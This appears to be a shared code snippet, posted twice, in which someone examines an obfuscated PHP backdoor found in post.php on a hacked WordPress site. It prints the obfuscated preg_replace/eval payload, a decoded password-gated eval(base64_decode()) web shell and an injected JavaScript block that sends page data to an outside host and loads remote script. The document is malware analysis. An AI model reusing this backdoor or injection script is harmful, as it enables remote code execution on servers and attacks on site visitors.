bronius · November 11, 2015 02:45
diff --git a/post.php b/post.php
 // Found this in a post.php in a hacked WordPress site. Just wanting to see how this evaluates.
 $sDo80i4="p".chr(114)."e".chr(103).chr(95)."\x72".chr(101)."\x70".chr(108)."a\x63\x65";
 $xm3MTJ="\x65v\x61".chr(108)."(\x62".chr(97).chr(115).chr(101).chr(54)."4\x5F\x64\x65c\x6Fd".chr(101)."\x28".chr(34)."\x51GVy".chr(99)."\x6d9\x79".chr(88).chr(51)."\x4a\x6c\x63\x47\x39\x79\x64".chr(71).chr(108)."\x75\x5a".chr(121)."gw".chr(75)."T\x73\x4e".chr(67).chr(107)."\x42\x70\x62m\x6c".chr(102)."\x632".chr(86)."\x30K".chr(67).chr(74).chr(107).chr(97).chr(88)."N\x77b".chr(71).chr(70).chr(53)."\x58\x32".chr(86)."\x79\x63".chr(109)."9\x79\x63yI\x73M".chr(67)."k\x37".chr(68)."\x51\x70\x41\x61\x575\x70X".chr(51)."N\x6cdC\x67ib".chr(71)."\x39".chr(110)."\x58".chr(50)."\x56y\x63m".chr(57).chr(121)."\x63".chr(121)."IsM".chr(67)."k".chr(55)."\x44Q\x70\x41".chr(97).chr(87)."\x35".chr(112)."X\x33".chr(78)."\x6c".chr(100)."\x43g\x69\x5a".chr(88)."J".chr(121)."b3".chr(74)."\x66\x62\x47".chr(57).chr(110)."\x49\x69ww\x4b\x54s\x4E\x43\x670\x4b".chr(97)."\x57\x59\x67K\x47lzc\x32V".chr(48)."K".chr(67)."\x52\x66".chr(85)."E".chr(57).chr(84)."VC".chr(107).chr(103).chr(74)."i\x59\x67".chr(97).chr(88)."N\x66".chr(89)."XJ".chr(121)."\x59\x58\x6b\x6F\x4A".chr(70)."\x39".chr(81)."\x54\x31\x4e".chr(85)."K".chr(83)."\x41\x6dJ".chr(105)."\x42\x6A".chr(98).chr(51)."V\x75d".chr(67)."g".chr(107)."\x581\x42\x50\x55".chr(49).chr(81).chr(112)."\x50\x6A\x45".chr(112)."DQ\x70".chr(55)."\x44".chr(81)."\x6F\x4A".chr(90)."\x6D9\x79\x5aW\x46\x6A".chr(97).chr(67)."A".chr(111)."\x4A".chr(70)."9QT\x31".chr(78)."\x55".chr(73)."GFz".chr(73).chr(67)."R2\x59\x58I".chr(112)."D".chr(81).chr(111)."J\x65".chr(119)."0".chr(75)."\x43Q".chr(108)."pZ\x69A".chr(111)."\x49W".chr(108).chr(122)."\x632\x56\x30".chr(75)."\x43Rjb".chr(50).chr(82).chr(108).chr(75)."Skg\x4a\x47\x4e".chr(118)."\x5A\x47\x55g".chr(80)."\x53\x41\x6b\x64\x6d".chr(70).chr(121)."O\x77\x30\x4BCQl\x6cb\x48\x4El".chr(97).chr(87)."Y\x67K\x43Fp\x633\x4e".chr(108).chr(100)."\x43\x67\x6B\x63\x47\x46\x7a\x63y\x6b\x70\x49\x43\x52\x77".chr(89)."XNzI\x44".chr(48)."\x67\x4a\x48\x5a".chr(104).chr(99)."j\x73N\x43\x67\x6B\x4A\x5A".chr(87)."\x78\x7AZ\x53".chr(66)."i".chr(99)."\x6D".chr(86)."\x68\x61\x7A\x73".chr(78)."Cg".chr(108)."9\x44".chr(81)."\x6F".chr(78)."Cgl\x70".chr(90)."i\x41\x6fJ\x48\x42".chr(104).chr(99)."3M\x67".chr(80).chr(84)."0".chr(103)."I".chr(107)."tC\x54".chr(49)."l\x30T".chr(50)."h".chr(80)."\x55nQzZ".chr(108)."I2U\x56\x46\x43".chr(77).chr(69)."\x56".chr(85).chr(78)."3\x4E".chr(49)."a".chr(110)."J\x49\x4f\x55c\x32".chr(90)."\x30".chr(99).chr(120)."\x49\x69".chr(107)."\x4EC".chr(103)."\x6c".chr(55).chr(68)."\x51\x6fJCW\x56\x32\x59".chr(87)."\x77\x6F\x59m".chr(70)."\x7aZTY".chr(48)."\x58".chr(50)."\x52\x6c\x59\x32\x39".chr(107)."\x5a".chr(83)."g".chr(107).chr(89)."\x32".chr(57).chr(107).chr(90)."\x53\x6B\x70O\x77".chr(48).chr(75)."C\x580".chr(78)."\x43n".chr(48).chr(78)."C".chr(109)."V".chr(52)."\x61\x58".chr(81)."\x37".chr(34)."\x29".chr(41)."\x3B";
 $vffF48m="/\x36c\x38\x66".chr(52)."\x34\x61\x32\x610\x66".chr(102)."2\x30\x37".chr(51)."\x65\x38f".chr(54)."\x38\x611\x35".chr(52).chr(54).chr(101).chr(53).chr(100)."\x3917/\x65";
 //$sDo80i4($vffF48m,$xm3MTJ,"\x36".chr(99)."\x38\x66\x34\x34".chr(97)."\x32\x610f\x66\x32\x30".chr(55)."3".chr(101).chr(56).chr(102)."\x36".chr(56).chr(97)."1\x354".chr(54).chr(101)."5".chr(100)."\x3917");

 var_dump( $sDo80i4 );
 var_dump( $xm3MTJ );
 var_dump( $vffF48m );

 /** Eventually begets something like: **/
 if (isset($_POST) && is_array($_POST) && count($_POST)>1)
 {
 	foreach ($_POST as $var)
 	{
 		if (!isset($code)) $code = $var;
 		elseif (!isset($pass)) $pass = $var;
 		else break;
 	}

 	if ($pass == "KBOYtOhORt3fR6QQB0ET7sujrH9G6gG1")
 	{
 		eval(base64_decode($code));
 	}
 }
 exit;"

 /** Which gets piped immediately into an eval();  So yeah, pretty much anything can get sent into this post.php and get executed on the hacked, unsuspected host server. :( **/



 /** The result of the above is a big preg_replace and something else that ends up writing the following client facing javascript block into all your themes' header.php:

 <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.wadex.com.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

 **/
	// Found this in a post.php in a hacked WordPress site. Just wanting to see how this evaluates.
	$sDo80i4="p".chr(114)."e".chr(103).chr(95)."\x72".chr(101)."\x70".chr(108)."a\x63\x65";
	$xm3MTJ="\x65v\x61".chr(108)."(\x62".chr(97).chr(115).chr(101).chr(54)."4\x5F\x64\x65c\x6Fd".chr(101)."\x28".chr(34)."\x51GVy".chr(99)."\x6d9\x79".chr(88).chr(51)."\x4a\x6c\x63\x47\x39\x79\x64".chr(71).chr(108)."\x75\x5a".chr(121)."gw".chr(75)."T\x73\x4e".chr(67).chr(107)."\x42\x70\x62m\x6c".chr(102)."\x632".chr(86)."\x30K".chr(67).chr(74).chr(107).chr(97).chr(88)."N\x77b".chr(71).chr(70).chr(53)."\x58\x32".chr(86)."\x79\x63".chr(109)."9\x79\x63yI\x73M".chr(67)."k\x37".chr(68)."\x51\x70\x41\x61\x575\x70X".chr(51)."N\x6cdC\x67ib".chr(71)."\x39".chr(110)."\x58".chr(50)."\x56y\x63m".chr(57).chr(121)."\x63".chr(121)."IsM".chr(67)."k".chr(55)."\x44Q\x70\x41".chr(97).chr(87)."\x35".chr(112)."X\x33".chr(78)."\x6c".chr(100)."\x43g\x69\x5a".chr(88)."J".chr(121)."b3".chr(74)."\x66\x62\x47".chr(57).chr(110)."\x49\x69ww\x4b\x54s\x4E\x43\x670\x4b".chr(97)."\x57\x59\x67K\x47lzc\x32V".chr(48)."K".chr(67)."\x52\x66".chr(85)."E".chr(57).chr(84)."VC".chr(107).chr(103).chr(74)."i\x59\x67".chr(97).chr(88)."N\x66".chr(89)."XJ".chr(121)."\x59\x58\x6b\x6F\x4A".chr(70)."\x39".chr(81)."\x54\x31\x4e".chr(85)."K".chr(83)."\x41\x6dJ".chr(105)."\x42\x6A".chr(98).chr(51)."V\x75d".chr(67)."g".chr(107)."\x581\x42\x50\x55".chr(49).chr(81).chr(112)."\x50\x6A\x45".chr(112)."DQ\x70".chr(55)."\x44".chr(81)."\x6F\x4A".chr(90)."\x6D9\x79\x5aW\x46\x6A".chr(97).chr(67)."A".chr(111)."\x4A".chr(70)."9QT\x31".chr(78)."\x55".chr(73)."GFz".chr(73).chr(67)."R2\x59\x58I".chr(112)."D".chr(81).chr(111)."J\x65".chr(119)."0".chr(75)."\x43Q".chr(108)."pZ\x69A".chr(111)."\x49W".chr(108).chr(122)."\x632\x56\x30".chr(75)."\x43Rjb".chr(50).chr(82).chr(108).chr(75)."Skg\x4a\x47\x4e".chr(118)."\x5A\x47\x55g".chr(80)."\x53\x41\x6b\x64\x6d".chr(70).chr(121)."O\x77\x30\x4BCQl\x6cb\x48\x4El".chr(97).chr(87)."Y\x67K\x43Fp\x633\x4e".chr(108).chr(100)."\x43\x67\x6B\x63\x47\x46\x7a\x63y\x6b\x70\x49\x43\x52\x77".chr(89)."XNzI\x44".chr(48)."\x67\x4a\x48\x5a".chr(104).chr(99)."j\x73N\x43\x67\x6B\x4A\x5A".chr(87)."\x78\x7AZ\x53".chr(66)."i".chr(99)."\x6D".chr(86)."\x68\x61\x7A\x73".chr(78)."Cg".chr(108)."9\x44".chr(81)."\x6F".chr(78)."Cgl\x70".chr(90)."i\x41\x6fJ\x48\x42".chr(104).chr(99)."3M\x67".chr(80).chr(84)."0".chr(103)."I".chr(107)."tC\x54".chr(49)."l\x30T".chr(50)."h".chr(80)."\x55nQzZ".chr(108)."I2U\x56\x46\x43".chr(77).chr(69)."\x56".chr(85).chr(78)."3\x4E".chr(49)."a".chr(110)."J\x49\x4f\x55c\x32".chr(90)."\x30".chr(99).chr(120)."\x49\x69".chr(107)."\x4EC".chr(103)."\x6c".chr(55).chr(68)."\x51\x6fJCW\x56\x32\x59".chr(87)."\x77\x6F\x59m".chr(70)."\x7aZTY".chr(48)."\x58".chr(50)."\x52\x6c\x59\x32\x39".chr(107)."\x5a".chr(83)."g".chr(107).chr(89)."\x32".chr(57).chr(107).chr(90)."\x53\x6B\x70O\x77".chr(48).chr(75)."C\x580".chr(78)."\x43n".chr(48).chr(78)."C".chr(109)."V".chr(52)."\x61\x58".chr(81)."\x37".chr(34)."\x29".chr(41)."\x3B";
	$vffF48m="/\x36c\x38\x66".chr(52)."\x34\x61\x32\x610\x66".chr(102)."2\x30\x37".chr(51)."\x65\x38f".chr(54)."\x38\x611\x35".chr(52).chr(54).chr(101).chr(53).chr(100)."\x3917/\x65";
	//$sDo80i4($vffF48m,$xm3MTJ,"\x36".chr(99)."\x38\x66\x34\x34".chr(97)."\x32\x610f\x66\x32\x30".chr(55)."3".chr(101).chr(56).chr(102)."\x36".chr(56).chr(97)."1\x354".chr(54).chr(101)."5".chr(100)."\x3917");

	var_dump( $sDo80i4 );
	var_dump( $xm3MTJ );
	var_dump( $vffF48m );

	/ Eventually begets something like: /
	if (isset($_POST) && is_array($_POST) && count($_POST)>1)
	{
	foreach ($_POST as $var)
	{
	if (!isset($code)) $code = $var;
	elseif (!isset($pass)) $pass = $var;
	else break;
	}

	if ($pass == "KBOYtOhORt3fR6QQB0ET7sujrH9G6gG1")
	{
	eval(base64_decode($code));
	}
	}
	exit;"

	/ Which gets piped immediately into an eval(); So yeah, pretty much anything can get sent into this post.php and get executed on the hacked, unsuspected host server. :( /



	/** The result of the above is a big preg_replace and something else that ends up writing the following client facing javascript block into all your themes' header.php:

	<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.wadex.com.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

	**/